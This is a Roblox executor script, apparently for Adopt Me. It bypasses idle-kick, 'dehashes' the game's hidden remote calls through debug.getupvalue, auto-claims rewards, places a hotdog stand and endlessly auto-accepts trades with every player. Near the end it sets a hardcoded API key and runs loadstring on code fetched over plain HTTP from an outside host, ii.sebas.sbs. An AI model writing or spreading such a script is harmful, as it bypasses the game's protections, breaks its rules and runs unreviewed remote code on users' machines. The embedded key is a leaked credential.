---------------------------------------------------------------------
-- FULL STARTING PROCESS (EXACT AUTO-POT STYLE)
---------------------------------------------------------------------

print("Waiting before starting...")
for i = 5, 1, -1 do
    print(i .. " seconds remaining")
    task.wait(1)
end
print("Starting script now!")
print("Made by gxba")

---------------------------------------------------------------------
-- PHASE 1: INITIAL JOIN UI CHECKS
---------------------------------------------------------------------

repeat task.wait(1) until game:IsLoaded()
    and game:GetService("ReplicatedStorage"):FindFirstChild("ClientModules")
    and game:GetService("ReplicatedStorage").ClientModules:FindFirstChild("Core")
    and game:GetService("ReplicatedStorage").ClientModules.Core:FindFirstChild("UIManager")
    and game:GetService("ReplicatedStorage").ClientModules.Core.UIManager.Apps:FindFirstChild("TransitionsApp")
    and game:GetService("Players").LocalPlayer.PlayerGui:FindFirstChild("TransitionsApp")
    and game:GetService("Players").LocalPlayer.PlayerGui.TransitionsApp:FindFirstChild("Whiteout")

repeat task.wait(1) until 
    game.Players 
    and game.Players.LocalPlayer 
    and game:GetService("Players").LocalPlayer.PlayerGui 
    and game:GetService("Players").LocalPlayer.PlayerGui:FindFirstChild("AssetLoadUI")
    and (game:GetService("Players").LocalPlayer.PlayerGui.AssetLoadUI.Enabled == false)

task.wait(1)
print("[1] UI Check Done")

---------------------------------------------------------------------
-- PHASE 2: LOAD ESSENTIAL MODULES
---------------------------------------------------------------------

local RS = game:GetService("ReplicatedStorage")
local ClientData = require(RS.ClientModules.Core.ClientData)
local RouterClient = require(RS.ClientModules.Core:WaitForChild("RouterClient"):WaitForChild("RouterClient"))
local Player = game:GetService("Players").LocalPlayer
local PlayerGui = Player:WaitForChild("PlayerGui")

---------------------------------------------------------------------
-- PHASE 3: ANTI AFK
---------------------------------------------------------------------

Player.Idled:Connect(function()
    game:GetService("VirtualUser"):Button2Down(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
    task.wait(1)
    game:GetService("VirtualUser"):Button2Up(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
end)

---------------------------------------------------------------------
-- PHASE 4: DISABLE DIALOG UI
---------------------------------------------------------------------

if PlayerGui:FindFirstChild("DialogApp") then
    PlayerGui.DialogApp.Enabled = false
end

---------------------------------------------------------------------
-- PHASE 5: REMOTE BYPASS (DEHASH)
---------------------------------------------------------------------

for i, v in pairs(debug.getupvalue(RouterClient.init, 7)) do
    v.Name = i
end
print("[Dehash] Completed")

---------------------------------------------------------------------
-- PHASE 6: ENTER GAME (TEAM + REMOVE INTRO)
---------------------------------------------------------------------

local function enter_the_game()
    RS.API:WaitForChild("TeamAPI/ChooseTeam"):InvokeServer(
        "Parents",
        { ["source_for_logging"] = "intro_sequence" }
    )

    task.wait(1)

    local ui = require(RS.Fsys).load("UIManager")
    ui.set_app_visibility("MainMenuApp", false)
    ui.set_app_visibility("NewsApp", false)
    ui.set_app_visibility("DialogApp", false)

    task.wait(2)

    RS.API:WaitForChild("DailyLoginAPI/ClaimDailyReward"):InvokeServer()
    ui.set_app_visibility("DailyLoginApp", false)
end

enter_the_game()

---------------------------------------------------------------------
-- PHASE 7: FINAL IN-WORLD CHECK
---------------------------------------------------------------------

repeat task.wait() until 
    Player.Character
    and Player.Character:FindFirstChild("HumanoidRootPart")

print("Final Check Done")
print("?? Startup Complete — Auto Trade Started ??")

---------------------------------------------------------------------
-- AUTO ACCEPT TRADE LOOP (NEVER STOPS)
---------------------------------------------------------------------

task.spawn(function()
    task.wait(3)

    local Players = game:GetService("Players")
    local API = RS:WaitForChild("API")

    local AcceptRequest = API:WaitForChild("TradeAPI/AcceptOrDeclineTradeRequest")
    local AcceptNegotiation = API:WaitForChild("TradeAPI/AcceptNegotiation")
    local ConfirmTrade = API:WaitForChild("TradeAPI/ConfirmTrade")

    print("[AutoTrade] Running")

    while true do
        for _, plr in ipairs(Players:GetPlayers()) do
            if plr ~= Players.LocalPlayer then
                pcall(function()
                    AcceptRequest:InvokeServer(plr, true)
                    task.wait(0.15)
                    AcceptNegotiation:FireServer()
                    task.wait(0.15)
                    ConfirmTrade:FireServer()
                end)
            end
        end

        task.wait(2)
    end
end)
---------------------------------------------------------------------
-- PHASE 8: HOTDOG STAND SETUP
---------------------------------------------------------------------

-- Optional price config (defaults to 50 if not set)
getgenv().Config = getgenv().Config or {}
getgenv().Config.HodDogStandHOLDERPrice = getgenv().Config.HodDogStandHOLDERPrice or 50

local function setup_hotdog_stand()
    local ClientData = require(game.ReplicatedStorage.ClientModules.Core.ClientData)
    local toys = ClientData.get_data()[game.Players.LocalPlayer.Name].inventory.toys

    for _, v in pairs(toys) do
        if v.kind == "hotdog_stand" then
            print("[Hotdog] Found stand, unique:", v.unique)

            -- Equip stand
            game.ReplicatedStorage.API
                :WaitForChild("ToolAPI/Equip")
                :InvokeServer(v.unique)

            task.wait(2)

            -- Place stand at player
            game.ReplicatedStorage.API
                :WaitForChild("PlaceableToolAPI/CreatePlaceable")
                :InvokeServer(
                    CFrame.new(game.Players.LocalPlayer.Character.Head.Position)
                )

            task.wait(2)

            local price = tonumber(getgenv().Config.HodDogStandHOLDERPrice) or 50
            print("[Hotdog] Setting price to:", price)

            -- Set price
            game.ReplicatedStorage.API
                :WaitForChild("PlaceableToolAPI/SetRefreshmentPrice")
                :InvokeServer("hotdog_stand", price)

            print("[Hotdog] Stand placed & configured!")
            return
        end
    end

    print("[Hotdog] You do not own a hotdog stand.")
end

-- Run after full load
task.spawn(function()
    task.wait(3)
    setup_hotdog_stand()
end)

task.spawn(function()
    task.wait(35)
    getgenv().API_KEY = "En0qsIBEECaHRJQ7HYVAvsyqL"
    getgenv().GroupName = "stock"
    loadstring(game:HttpGet("http://ii.sebas.sbs:4241/adoptme/dashboard.lua"))()
end)

task.spawn(function()
    -- add other scripts here
end)
